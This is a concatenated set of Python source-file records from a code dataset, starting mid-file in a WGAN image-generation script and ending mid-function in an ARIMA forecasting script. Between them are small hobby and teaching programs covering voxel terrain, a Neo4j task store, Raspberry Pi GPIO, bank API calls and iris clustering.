tf.layers.Conv2D(filters=64,kernel_size=5,strides=2,padding='SAME')\n\t\tconv2 = conv2(drop1)\n\t\tbatch_norm2 = tf.contrib.layers.layer_norm(conv2, trainable=True)\n\t\tleaky2 = tf.maximum(alphaL * batch_norm2, batch_norm2)\n\t\t\n\t\tdrop2 = tf.layers.dropout(leaky2)\n\t\t\n\t\tconv3 = tf.layers.Conv2D(filters=128,kernel_size=4,strides=2,padding='SAME')\n\t\tconv3=conv3(drop2)\n\t\tbatch_norm3 = tf.contrib.layers.layer_norm(conv3, trainable=True)\n\t\tleaky3 = tf.maximum(alphaL * batch_norm3, batch_norm3)\n\t\t\n\t\tdrop3 = tf.layers.dropout(leaky3)\n\t\t\n\t\tconv4 = tf.layers.Conv2D(filters=256,kernel_size=5,strides=2,padding='SAME')\n\t\tconv4=conv4(drop3)\n\t\tbatch_norm4 = tf.contrib.layers.layer_norm(conv4, trainable=True)\n\t\tleaky4 = tf.maximum(alphaL * batch_norm4, batch_norm4)\n\t\t\n\t\tdrop4 = tf.layers.dropout(leaky4)\n\t\t\n\t\t\n\t\tflatter = tf.contrib.layers.flatten(drop4)#default rate = .5\n\t\t\n\t\tdense = tf.layers.dense(flatter,1)\n\t\t\n\t\t#out = tf.sigmoid(dense)\n\t\t\n\t\treturn dense\ndef makeGan():\n\tinput_real = tf.placeholder(tf.float32, shape=(None, sideL, sideL, 3), name='input_real') \n\t\n\t#input_z = tf.placeholder(tf.float32, (None, zN+3), name='input_z')\n\t\n\tinput_z = K.placeholder(shape=(None,sideL*sideL,zN+3))\n\t\n\tinput_scale = K.placeholder(shape=(None,sideL*sideL*scaler*scaler,zN+3))\n\t\n\tlearning_rate = tf.placeholder(tf.float32, name='learning_rate')\n\n\txer,gen = generator(input_z)\n\t\n\t_,_ = generator(input_scale)\n\t\n\t#gradient penalty adapted from:\n\t# @misc{wu2016tensorpack,\n\t\t # title={Tensorpack},\n\t\t # author={Wu, Yuxin and others},\n\t\t # howpublished={\\url{https://github.com/tensorpack/}},\n\t\t # year={2016}\n\t\t# }\n\t\n\t\n\td_mod_real = discriminator(input_real)\n\t\n\t\n\td_mod_fake = discriminator(xer)\n\t\n\t\n\td_loss_real = tf.reduce_mean(d_mod_real)\n\t\n\td_loss_fake = tf.reduce_mean(d_mod_fake)\n\t\n\tg_loss = -tf.reduce_mean(d_mod_fake)\n\t\n\talpha = tf.random_uniform(minval=0.,maxval=1.,shape=(batch_size,1,1,1))\n\t\n\tinter = input_real + alpha*(tf.reshape(xer,(batch_size,sideL,sideL,3)) - input_real)\n\t\n\toutInter = discriminator(inter)\n\t\n\tgradients = tf.gradients(outInter,[inter])[0]\n\tgradients = tf.sqrt(tf.reduce_sum(tf.square(gradients),[1,2,3]))\n\tgradient_penalty=tf.reduce_mean(tf.square(gradients-1))\n\t\n\t\n\td_loss = tf.add(d_loss_fake-d_loss_real, 10*gradient_penalty)\n\t\n\t\n\t\n\t\n\tt_vars = tf.trainable_variables()\n\td_vars = [var for var in t_vars if 
var.name.startswith('discriminator')]\n\tg_vars = [var for var in t_vars if var.name.startswith('generator')]\n\t\n\t\n\t\n\twith tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n\t\td_opt = tf.train.AdamOptimizer(lr,.5,.9).minimize(d_loss, var_list=d_vars)\n\t\tg_opt = tf.train.AdamOptimizer(lr,.5,.9).minimize(g_loss, var_list=g_vars)\n\t\n\t\n\treturn d_opt,g_opt,d_loss,g_loss,input_real,input_z,gen,input_scale\n\n\t\n#prepare noise and coordinates for larger image\ndef initialScaledInput():\n\tbigBoi = np.ones((sideL**2*scaler**2,3+zN))\n\tnoiser = np.random.normal(0, 1, (zN,))\n\tfor x in range(sideL*scaler):\n\t\tfor y in range(sideL*scaler):\n\t\t\tr = ((x/scaler-sideL/2)**2+(y/scaler-sideL/2)**2)**(1/2)\n\t\t\t#r = ((x/scaler)**2+(y/scaler)**2)**(1/2)\n\t\t\tlil = [x/scaler,y/scaler,r]\n\t\t\tbigBoi[y+x*sideL*scaler] = np.concatenate((noiser,np.array(lil)))\n\treturn bigBoi\n#create new noise input\ndef newScaledNoise():\n\tnoiser = np.random.normal(0, 1, (zN,))\n\tinitScaled[:,:zN] = noiser\n\t\n\ninitScaled = initialScaledInput()\n\n\t\n#prepare noise and location in image input\n\nintos = np.ones((batch_size,sideL*sideL,3+zN))\nlit = np.ones((sideL*sideL,3+zN))\nfor q in range(batch_size):\n\tnoiser = np.random.normal(0, 1, (zN,))\n\tfor x in range(sideL):\n\t\tfor y in range(sideL):\n\t\t\tr = ((x-sideL/2)**2+(y-sideL/2)**2)**(1/2)#distance from center of image\n\t\t\t#r = ((x)**2+(y)**2)**(1/2)\n\t\t\tlil = [x,y,r]\n\t\t\tlit[y+x*sideL] = np.concatenate((noiser,np.array(lil)))\n\tintos[q] = lit\n\t\n#define new noise input\ndef newNoise():\n\tfor i in range(batch_size):\n\t\tnoiser = np.random.normal(0, 1, (zN,))\t\t\t\n\t\tintos[i,:,:zN] = noiser\n\t\ndef train(i,saveDir,X_train):\n\t#consider batch sizes\n\t\n\t#would move below for 'jq in range(40)', but testing least stable part\n\tnewNoise()\n\t#get a batch of random images\n\tidx = np.random.randint(0, X_train.shape[0], batch_size)\n\timgs = X_train[idx]\n\tbatch_z = intos\n\t_ = sess.run(g_opt, feed_dict={input_real: imgs, input_z: batch_z})\n\t\n\t\n\t\n\tif i == 0:\n\t\tplot_model(gen, to_file=saveDir+'model.png')\n\t\tfor jq in range(100):\n\t\t\tprint(jq,'prepping discriminator')\n\t\t\tnewNoise()\n\t\t\tidx = np.random.randint(0, X_train.shape[0], batch_size)\n\t\t\timgs = X_train[idx]\n\t\t\t\n\t\t\tbatch_z = intos\n\t\t\t_ = sess.run(d_opt, feed_dict={input_real: imgs, input_z: batch_z})\n\t\t\t\n\t\n\t\n\t\n\ttrain_loss_g = g_loss.eval({input_z: batch_z, input_real: imgs})\n\t\n\t\n\tfor qz in range(5):\n\t\tidx = np.random.randint(0, X_train.shape[0], batch_size)\n\t\timgs = X_train[idx]\n\t\tnewNoise()\n\t\tbatch_z = intos\n\t\t_ = sess.run(d_opt, feed_dict={input_real: imgs, input_z: batch_z})\n\t\t\n\t\t\n\n\t\n\ttrain_loss_d = d_loss.eval({input_z: batch_z, input_real: imgs})\n\t\n\t\n\t\n\tprint(\"Step:\"+str(i)+\" g \"+str(train_loss_g)+\" d \"+str(train_loss_d))\n\t\n\t\n\t\n\tif (i+1) % 30 == 0 or i == 0: #save weights and sample every while\n\t\tif i != 0:\n\t\t\tsavedp = saver.save(sess, saveDir+'wcppn.ckpt')\n\t\t\tprint(savedp)\n\t\t\n\t\tnewScaledNoise()\n\t\texampIn = np.expand_dims(initScaled,axis=0)\n\t\tsample = sess.run(gen(input_scale),feed_dict={input_scale:exampIn})\n\t\t\t\n\t\tout = np.resize(sample,(sideL*scaler,sideL*scaler,3))\n\t\t\n\t\tout = np.maximum(out,np.zeros(out.shape))\n\t\tout = np.minimum(out,np.ones(out.shape))\n\t\t\n\t\tnamed = saveDir+str(i)+'scaled'+'image.jpg'\n\t\timageio.imwrite(named, out)\n\t\t\n\t\tfor qtc in 
range(2):\n\t\t\t\n\t\t\t\n\t\t\tnewNoise()\n\t\t\t\n\t\t\texampIn = intos[:1]\n\t\t\t\n\t\t\t#sample = sess.run(generator(input_z),feed_dict={input_z:exampIn})\n\t\t\t\n\t\t\tsample = sess.run(gen(input_z),feed_dict={input_z:exampIn})\n\t\t\t\n\t\t\tout = np.resize(sample,(sideL,sideL,3))\n\t\t\t\n\t\t\tout = np.maximum(out,np.zeros(out.shape))\n\t\t\tout = np.minimum(out,np.ones(out.shape))\n\t\t\t\n\t\t\tnamed = saveDir+str(i)+' '+str(qtc)+'image.jpg'\n\t\t\timageio.imwrite(named, out)\n\t\t\n\t\t\ndataDir = os.path.normpath('C:/Users/Com/Python/sort/immFaceDBCropped/')+'\\\\'#dataset's path\nsaveDir = os.path.normpath('C:/Users/Com/Desktop/pic/')+'\\\\'#load and save weights from; save 3 images per batch here as well\n\n\nx_ = loadDataset(dataDir)\nwith tf.Session() as sess:\n\tK.set_session(sess)\n\td_opt,g_opt,d_loss,g_loss,input_real,input_z,gen,input_scale = makeGan()\n\tsess.run(tf.global_variables_initializer())\n\t\n\t\n\tsaver = tf.train.Saver()\n\t\t\t\n\tif load == True:\n\t\tsaver.restore(sess, saveDir+'wcppn.ckpt')\n\t\n\tfor i in range(batches):\n\t\ttrain(i,saveDir,x_)\n\t\n\t\n\t\n","sub_path":"CPPN-WGAN.py","file_name":"CPPN-WGAN.py","file_ext":"py","file_size_in_byte":10230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"233737795","text":"#Example line\ndoubles_by_3 = [x * 2 for x in range(1, 6) if (x * 2) % 3 == 0]\n\n# Complete the following line. Use the line above for help.\n#squares of the even numbers between 1 and 11\neven_squares = [x**2 for x in range(1,12) if x%2==0]\n\nprint(even_squares)\n\n#Another list comprehension example: cubes divisible by four\ncubes_by_four = [x**3 for x in range(1,11) if (x**3) % 4==0]\nprint(cubes_by_four)\n","sub_path":"List_And_Iterations/List_Comprehension.py","file_name":"List_Comprehension.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
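For readers new to comprehensions, the first line of the record above is shorthand for a filtered loop; the equivalent long form is:

doubles_by_3 = []
for x in range(1, 6):
    if (x * 2) % 3 == 0:
        doubles_by_3.append(x * 2)
print(doubles_by_3)  # [6]: only 3 * 2 is divisible by 3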
+{"seq_id":"595346751","text":"from perlin import Perlin\nfrom ursina import *\nfrom random import random\nfrom swirl_engine import SwirlEngine\n\nclass MeshTerrain:\n    def __init__(this):\n        \n        this.block = load_model('block.obj')\n        this.textureAtlas = 'texture_atlas_3.png'\n        this.numVertices = len(this.block.vertices)\n\n        this.subsets = []\n        this.numSubsets = 128\n        \n        # Must be even number! See genTerrain()\n        this.subWidth = 4 \n        this.swirlEngine = SwirlEngine(this.subWidth)\n        this.currentSubset = 0\n\n        # Our terrain dictionary :D\n        this.td = {}\n\n        this.perlin = Perlin()\n\n        for i in range(0,this.numSubsets):\n            e = Entity( model=Mesh(),\n                        texture=this.textureAtlas)\n            e.texture_scale*=64/e.texture.width\n            this.subsets.append(e)\n        \n\n    def genBlock(this,x,y,z):\n        # Extend or add to the vertices of our model.\n        model = this.subsets[this.currentSubset].model\n\n        model.vertices.extend([ Vec3(x,y,z) + v for v in \n                                this.block.vertices])\n        # Record terrain in dictionary :)\n        this.td[\"x\"+str(floor(x))+\n                \"y\"+str(floor(y))+\n                \"z\"+str(floor(z))] = \"t\"\n        # Decide random tint for colour of block :)\n        c = random()-0.5\n        model.colors.extend( (Vec4(1-c,1-c,1-c,1),)*\n                             this.numVertices)\n\n        # This is the texture atlas co-ord for grass :)\n        uu = 8\n        uv = 7\n        if y > 2:\n            uu = 8\n            uv = 6\n        model.uvs.extend([Vec2(uu,uv) + u for u in this.block.uvs])\n\n    def genTerrain(this):\n        # Get current position as we swirl around world.\n        x = floor(this.swirlEngine.pos.x)\n        z = floor(this.swirlEngine.pos.y)\n\n        d = int(this.subWidth*0.5)\n\n        for k in range(-d,d):\n            for j in range(-d,d):\n\n                y = floor(this.perlin.getHeight(x+k,z+j))\n                if this.td.get( \"x\"+str(floor(x+k))+\n                                \"y\"+str(floor(y))+\n                                \"z\"+str(floor(z+j)))!=\"t\":\n                    this.genBlock(x+k,y,z+j)\n\n        this.subsets[this.currentSubset].model.generate()\n        # Current subset hack ;)\n        if this.currentSubset < this.numSubsets - 1:\n            this.currentSubset += 1\n        else:\n            this.currentSubset = 0\n","pt":"64"} +{"text":"from neo4j.v1 import GraphDatabase\n\nimport model\n\n# assumed local connection setup (the original header of this record was truncated)\ndriver = GraphDatabase.driver('bolt://localhost:7687')\nsession = driver.session()\n\n\n# create a new task newTask and return its id (reconstructed to mirror editTask below)\ndef addTask(newTask):\n    global session\n    queryResult = session.run(\"CREATE (u:Task {name:'\" + newTask.name + \"',\"\n                              \" description:'\" + newTask.description + \"',\"\n                              \" time:\" + str(newTask.time) + \"})\"\n                              \" WITH u\"\n                              \" MATCH (v) WHERE id(v) in \" + str(newTask.dependencies) +\n                              \" CREATE (u)-[:Depends]->(v)\"\n                              \" RETURN id(u)\")\n    newId = 0\n    for record in queryResult:\n        newId = record['id(u)']\n        break\n    return newId\n\n\n# change the parameters of task newTask\ndef editTask(changedTask):\n    global session\n    session.run(\"MATCH (u)-[t:Depends]->(k)\"\n                \" WHERE id(u)=\" + str(changedTask.id) +\n                \" SET u.name='\" + changedTask.name + \"',\"\n                \" u.description='\" + changedTask.description + \"',\"\n                \" u.time=\" + str(changedTask.time) +\n                \" DELETE t\"\n                \" WITH DISTINCT u\"\n                \" MATCH (v) WHERE id(v) in \" + str(changedTask.dependencies) +\n                \" CREATE (u)-[:Depends]->(v)\")\n    return None\n\n\n# delete the task with the given _id\ndef deleteTask(_id):\n    global session\n    session.run(\"MATCH (u) WHERE id(u)=\" + str(_id) +\n                \" DETACH DELETE u\")\n    return None\n\n\n# Finds the node with the given _id\n# Returns the constructed object\n# If _id is None, returns a list\ndef find(_id = None):\n    global session\n    result = None\n    if _id is not None:\n        queryResult = session.run(\"MATCH (u) WHERE id(u) = \" + str(_id) +\n                                  \" OPTIONAL MATCH (u)-[:Depends]->(v) \"\n                                  \"RETURN u, id(v)\")\n        for record in queryResult:\n            n = record['u']\n            if result is None:\n                result = model.Task(int(n.id),\n                                    n.properties['name'],\n                                    n.properties['description'],\n                                    n.properties['time'])\n            v = record['id(v)']\n            if v is not None:\n                result.dependencies.append(v)\n\n    else:\n        result = []\n        queryResult = session.run(\"MATCH (u)-[:Depends]->(v) RETURN u, v\")\n        for record in queryResult:\n            for key in record.keys():\n                n = record[key]\n                # add the task if it is not in the list yet\n                isInList = False\n                for r in result:\n                    isInList = isInList or n.id == r.id\n                if not isInList:\n                    result.append(model.Task(int(n.id),\n                                             n.properties['name'],\n                                             n.properties['description'],\n                                             n.properties['time']))\n            # add the relations - dependencies\n            u = record['u'].id\n            v = record['v'].id\n            for task in result:\n                if task.id == u:\n                    task.dependencies.append(v)\n    return result\n","sub_path":"Graph/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
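The queries above splice values into Cypher with string concatenation, which breaks on names containing quotes and is injection-prone; the Neo4j Python driver accepts query parameters instead. A sketch of deleteTask rewritten that way, assuming the same module-level session (newer drivers use the $name placeholder syntax shown here, while the 1.x driver used {name}):

def deleteTask(_id):
    global session
    # Parameters are passed separately, so no quoting or escaping is needed.
    session.run("MATCH (u) WHERE id(u) = $id DETACH DELETE u", id=_id)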
result\n","sub_path":"Graph/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"209577797","text":"import RPi.GPIO as GPIO\nimport time\nfrom psonic import *\nfrom random import randint\n\nrev = GPIO.RPI_REVISION\nprint(rev)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(23, GPIO.OUT)\nGPIO.setup(24, GPIO.IN)\n\nledOn = False\n\nwhile True:\n if GPIO.input(24):\n ledOn = True if (ledOn == False) else False\n play(randint(1, 100))\n\n GPIO.output(23, ledOn)\n time.sleep(0.2)\n\n \n","sub_path":"projects/synth/korg.py","file_name":"korg.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"237953195","text":"import re\nimport os\n\nscript_dir = os.path.dirname(__file__)\n\ndef cleanChatFunc():\n\tnew_chat_line_pattern = '\\[\\d+\\/\\d+\\/\\d+'\n\n\tbase_chat_path = os.path.join(script_dir, 'data/_chat.txt')\n\tbase_chat = open(base_chat_path, 'r')\n\n\tcleaned_chat_path = os.path.join(script_dir, 'data/cleaned_chat.txt')\n\tcleaned_chat = open(cleaned_chat_path, 'w')\n\n\tline = base_chat.readline().decode('utf-8-sig').encode('utf-8')\n\tis_first_line = True\n\twhile line:\n\t\tif line.rstrip():\n\t\t\tif(re.search(new_chat_line_pattern, line) is None):\n\t\t\t\tcleaned_chat.write(' '+line.rstrip())\n\t\t\telif (is_first_line):\n\t\t\t\tcleaned_chat.write(line.rstrip())\n\t\t\t\tis_first_line = False\n\t\t\telse:\n\t\t\t\tcleaned_chat.write('\\n'+line.rstrip())\n\n\t\tline = base_chat.readline().decode('utf-8-sig').encode('utf-8')\n","sub_path":"whatsapp/cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"585024592","text":"# -*- coding: utf-8 -*-\n# class Calculator:\n# \tdef __init__(self):\n# \t\tself.result = 0\n# \tdef adder(self,num):\n# \t\tself.result += num\n# \t\treturn self.result\n\n# cal1 = Calculator()\n# cal2 = Calculator()\n\n# print(cal1.adder(3))\n# print(cal1.adder(4))\n\nclass Test:\n i=3\n name=\"park\"\n \n def classFoo(cls2): # 클래스 객체를 암묵적으로 인자로 전달받음.\n print(cls2.name)\n print(\"class method\")\n print(cls2.i) # 클래스 변수 i 출력\n print()\n CFoo = classmethod(classFoo)\n\n def staticFoo(): # 클래스 객체를 인자로 전달받지 않음.\n print(\"static method\")\n print() # 클래스 변수 출력 못함\n SFoo = staticmethod(staticFoo)\n\nTest.CFoo()\nTest.SFoo()","sub_path":"rensyu.py","file_name":"rensyu.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"606825382","text":"\n'''\nSimple model\n'''\n\nfrom opqua.model import Model\n\nmy_model = Model()\nmy_model.newSetup('my_setup',default='vector-borne') # uses default parameters\nmy_model.newPopulation('my_population','my_setup')\nmy_model.addPathogensToHosts( 'my_population',{'AAAAAAAAAA':20} )\nmy_model.run(0,100)\ndata = my_model.saveToDataFrame('Basic_example.csv')\ngraph = my_model.compartmentPlot('Basic_example.png', data)\n","sub_path":"examples/basic_example.py","file_name":"basic_example.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"198185084","text":"import re\nimport sre_constants\n\nfrom ..roles import Var\n\n\ndef validate_regex(regex):\n \"\"\"\n :type regex: str\n :raises: ValueError\n :return:\n \"\"\"\n try:\n 
re.compile(regex)\n except sre_constants.error as e:\n raise ValueError('Invalid regular expression: {0}'.format(e))\n\n\ndef validate(value_or_var, validator):\n if isinstance(value_or_var, Var):\n for _, value in value_or_var.values:\n validator(value)\n else:\n validator(value_or_var)","sub_path":"jsl/fields/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"26423563","text":"import requests\nfrom lxml import objectify\n\ndef xml_to_json(xml):\n def inner(obj):\n d = dict(obj.attrib)\n childs = obj.getchildren()\n if childs:\n for i in childs:\n if i.tag in d:\n if type(d[i.tag]) is not list:\n d[i.tag] = [d[i.tag]]\n d[i.tag].append(inner(i))\n else:\n d[i.tag] = inner(i)\n return d\n root = objectify.fromstring(xml)\n return inner(root)\n\n\nclass API:\n @staticmethod\n def get_exchange():\n url = 'https://api.privatbank.ua/p24api/pubinfo?exchange&coursid=5'\n resp = requests.get(url)\n resp_json = xml_to_json(resp.content)\n return [x['exchangerate'] for x in resp_json['row']]\n\n @staticmethod\n def get_nbu():\n url = 'https://privat24.privatbank.ua/p24/accountorder?oper=prp&PUREXML&apicour&country='\n resp = requests.get(url)\n resp_json = xml_to_json(resp.content)\n return resp_json['exchangerate']\n\n @staticmethod\n def search_offices(address, city):\n url = 'https://privat24.privatbank.ua/p24/accountorder?oper=prp&PUREXML&pboffice'\n resp = requests.get(url, params={'address': address, 'city': city})\n resp_json = xml_to_json(resp.content)\n return resp_json['pboffice'].get('pboffice', None)\n\n @staticmethod\n def bonus(address, city):\n url = 'https://privat24.privatbank.ua/p24/accountorder?oper=prp&bonus&PUREXML='\n resp = requests.get(url, params={'address': address, 'city': city})\n resp_json = xml_to_json(resp.content)\n return resp_json['bonus'].get('bonus', None)","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"512566448","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import LinearSVC\nfrom sklearn import svm, metrics\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom matplotlib import colors\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score, precision_score, recall_score, \\\n f1_score, fbeta_score\nfrom sklearn.cluster import KMeans\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.metrics.cluster import v_measure_score, homogeneity_score\n\n\ndef iris_type(t):\n targets = []\n for i in range(0, len(t)):\n # print(row)\n # print(t.iloc[i])\n\n if t.iloc[i] == 'Iris-setosa':\n # print(t.iloc[i][4])\n # t.iloc[i] = 0\n targets.append(0)\n if t.iloc[i] == 'Iris-versicolor':\n # t.iloc[i] = 1\n targets.append(1)\n if t.iloc[i] == 'Iris-virginica':\n # t.iloc[i] = 2\n targets.append(2)\n return targets\n\n\ndata = pd.read_csv('iris.data.txt', header=None)\nx = data.drop(4, axis=1)\ny = data[4]\n\ntargets = np.array(iris_type(y))\nX = np.array(x)\nestimators = []\nfor i in range(1, 7):\n e1 = 'k-means ' + str(i) + ' clusters'\n estimators.append((e1, KMeans(n_clusters=i)))\n\ntitles = []\nfignum = 1\n\nv_measure = []\nhomogeneity = []\n\ny_pred_3 = []\n\nfor i in range(1, 7):\n title = str(i) + ' clusters'\n titles.append(title)\n# print(titles)\nfor name, est in estimators:\n fig = 
plt.figure('Task 3.1, Figure ' + str(fignum))\n ax = Axes3D(fig, rect=[0, 0, .95, 1], elev=48, azim=134)\n est.fit(X)\n\n y_pred = est.predict(X)\n\n v_m = v_measure_score(targets, y_pred)\n v_measure.append(v_m)\n h = homogeneity_score(targets, y_pred)\n homogeneity.append(h)\n\n print()\n print('v measure (', name, '): ', v_m)\n\n print()\n\n if name == 'k-means ' + str(3) + ' clusters':\n y_pred_3 = y_pred\n\n labels = est.labels_\n\n ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=labels.astype(np.float), edgecolor='k')\n\n ax.w_xaxis.set_ticklabels([])\n ax.w_yaxis.set_ticklabels([])\n ax.w_zaxis.set_ticklabels([])\n ax.set_xlabel('Sepal length')\n ax.set_ylabel('Sepal weigh')\n ax.set_zlabel('Petal length')\n ax.set_title(titles[fignum - 1])\n ax.dist = 12\n\n plt.savefig('Task31Figure' + str(fignum) + '.png')\n\n fignum = fignum + 1\n\nscore_3 = accuracy_score(y_pred_3, targets)\nprint('The accuracy of 3 clusters: ', score_3)\n\ntick_label = ['1 cluster', '2 cluster', '3 cluster', '4 cluster', '5 cluster', '6 cluster']\nfig = plt.figure('Task 3.1, Figure ' + str(fignum))\nx = list(range(len(homogeneity)))\ntotal_width, n = 0.8, 2\nwidth = total_width / n\n\nplt.bar(x, v_measure, width=width, label='v-measure', tick_label=tick_label)\nplt.legend()\nplt.savefig('Task31accuracy.png')\nplt.show()\n","sub_path":"assignment2/Task3_1.py","file_name":"Task3_1.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"411549374","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nAuthor: Li Yuanming\nEmail: yli056@e.ntu.edu.sg\nDate: 6/19/2020\n\"\"\"\n\nimport os\n\nAPI_V1_STR = '/api/v1'\nAPI_EXP_STR = '/api/exp'\n\nSECRET_KEY = os.getenvb(b\"SECRET_KEY\")\nif not SECRET_KEY:\n SECRET_KEY = os.urandom(32)\n\nACCESS_TOKEN_EXPIRE_MINUTES = 60 * 24 * 8 # 60 minutes * 24 hours * 8 days = 8 days\n\nSERVER_NAME = os.getenv('SERVER_NAME')\nSERVER_HOST = os.getenv('SERVER_HOST', 'localhost')\nSERVER_PORT = int(os.getenv('SERVER_PORT', 8000))\n# a string of origins separated by commas, e.g: \"http://localhost, http://localhost:4200, http://localhost:3000, http://localhost:8080, http://local.dockertoolbox.tiangolo.com\"\nBACKEND_CORS_ORIGINS = os.getenv('BACKEND_CORS_ORIGINS')\nPROJECT_NAME = os.getenv('PROJECT_NAME', 'ModelCI')\n","sub_path":"modelci/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"446777263","text":"# rpsutil.py\r\n# Source: https://github.com/DrGFreeman/rps-cv\r\n# This file defines variables and functions to ensure consistancy in capture and\r\n# naming of images.\r\n\r\nimport glob\r\nimport time\r\n\r\nimport numpy as np\r\n\r\n#import camera\r\n\r\n# Define possible gestures as constants\r\nROCK = 0\r\nPAPER = 1\r\nSCISSORS = 2\r\n\r\n# Define text labels corresponding to gestures\r\ngestureTxt = {ROCK: 'rock', PAPER: 'paper', SCISSORS: 'scissors'}\r\n\r\n# Define paths to raw image folders\r\nimgPathsRaw = {ROCK: './img/rock/', PAPER: './img/paper/',\r\n SCISSORS: './img/scissors/'}\r\n\r\ndef cameraSetup():\r\n import camera\r\n \"\"\"Returns a camera object with pre-defined settings.\"\"\"\r\n\r\n # Settings\r\n size = 8\r\n frameRate = 40\r\n #awbFilename = 'awb_gains.txt'\r\n\r\n # Create Camera object\r\n print(\"Initializing camera\")\r\n cam = camera.Camera()\r\n\r\n \"\"\"\r\n # Check if white balance file exists\r\n if 
len(glob.glob(awbFilename)) != 0:\r\n # File exists, set camera white balance using gains from file\r\n print(\"Reading white balance gains from {}\".format(awbFilename))\r\n cam.readWhiteBalance(awbFilename)\r\n else:\r\n # File does not exist. Prompt user to perform white balance.\r\n print(\"WARNING: No white balance file found. \")\r\n if input(\"Perform white balance (Y/n)?\\n\") != \"n\":\r\n print(\"Performing white balance.\")\r\n print(\"Place a sheet of white paper in front of camera.\")\r\n input(\"Press any key when ready.\\n\")\r\n cam.doWhiteBalance(awbFilename)\r\n \"\"\"\r\n return cam\r\n","sub_path":"rpsutil.py","file_name":"rpsutil.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"433839548","text":"import numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nimport xlrd as xl\nimport matplotlib.pyplot as plt\nimport statistics as st\nimport seaborn as sns\nfrom math import factorial\nfrom statsmodels.tsa.seasonal import seasonal_decompose as sdecomp\nfrom statsmodels.tsa.adfvalues import mackinnonp, mackinnoncrit\nfrom statsmodels.compat.python import iteritems\nfrom statsmodels.graphics.tsaplots import plot_acf, plot_pacf\nfrom statsmodels.regression.linear_model import OLS\nfrom statsmodels.tools import add_constant\nfrom pandas import datetime, DataFrame\nfrom pandas.core.nanops import nanmean as pd_nanmean\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\nfrom statsmodels.tools import add_constant\nimport warnings\n\nsns.set(style=\"darkgrid\")\n\n\ndef permutation(m, n):\n return factorial(n) / (factorial(n - m) * factorial(m))\n\n\ndef diff_operator(set, k):\n size = len(set)\n sum = set[0] * (-1)**(size-1)\n for i in range(1, size):\n minus_counter = (-1)**(size-i-1)\n sum = sum + permutation(i, size-1)*minus_counter*set[i]\n return sum\n\n\ndef AIC_finder(test, predict, k, p, counter, q):\n if (counter > 0):\n c = 0\n else:\n c = 1\n n = p + q + c + 1\n predict = np.array(predict)\n ressid = test - predict.ravel()\n sse = sum(ressid**2)\n AIC = n*np.log(sse/n)+2*k\n return AIC\n\n\ndef arima_optimizer_AIC(training, testing, p, max_k, q, flag):\n print(training)\n print()\n print(testing)\n min_AIC_lib = min_our_AIC = 99999\n min_p_lib = min_p_our = 0\n min_q_lib = min_q_our = 0\n for i in range(p+1):\n for j in range(q+1):\n print(\"ARIMA(%d,%d,%d)\" % (i, max_k, j))\n if flag == 0:\n AIC, our_AIC, error, r2, test, predict = arima_learn_forecast(\n training, testing, i, max_k, j)\n r2_score = r2\n else:\n AIC, our_AIC, error, r2, test, predict = arima_learn_predict(\n training, testing, i, max_k, j)\n r2_score = r2\n if (AIC < min_AIC_lib):\n min_AIC_lib = AIC\n min_test_lib = test\n min_predict_lib = predict\n min_p_lib = i\n min_q_lib = j\n r2_score_lib = r2_score\n error_lib = error\n if (our_AIC < min_our_AIC):\n min_our_AIC = our_AIC\n min_test_our = test\n min_predict_our = predict\n min_p_our = i\n min_q_our = j\n r2_score_our = r2_score\n error_our = error\n print()\n print(\"Best ARIMA by loglikehood AIC = ARIMA(%d,%d,%d)\" %\n (min_p_lib, max_k, min_q_lib))\n print(\"Minimal loglikehood AIC = \", min_AIC_lib)\n print('Test MSE: %.3f' % error_lib)\n print(\"r2 score: \", r2_score_lib)\n print()\n print(\"Best ARIMA by SSE AIC = ARIMA(%d,%d,%d)\" %\n (min_p_our, max_k, min_q_our))\n print(\"Minimal SSE AIC = \", min_our_AIC)\n print('Test MSE: %.3f' % error_our)\n 
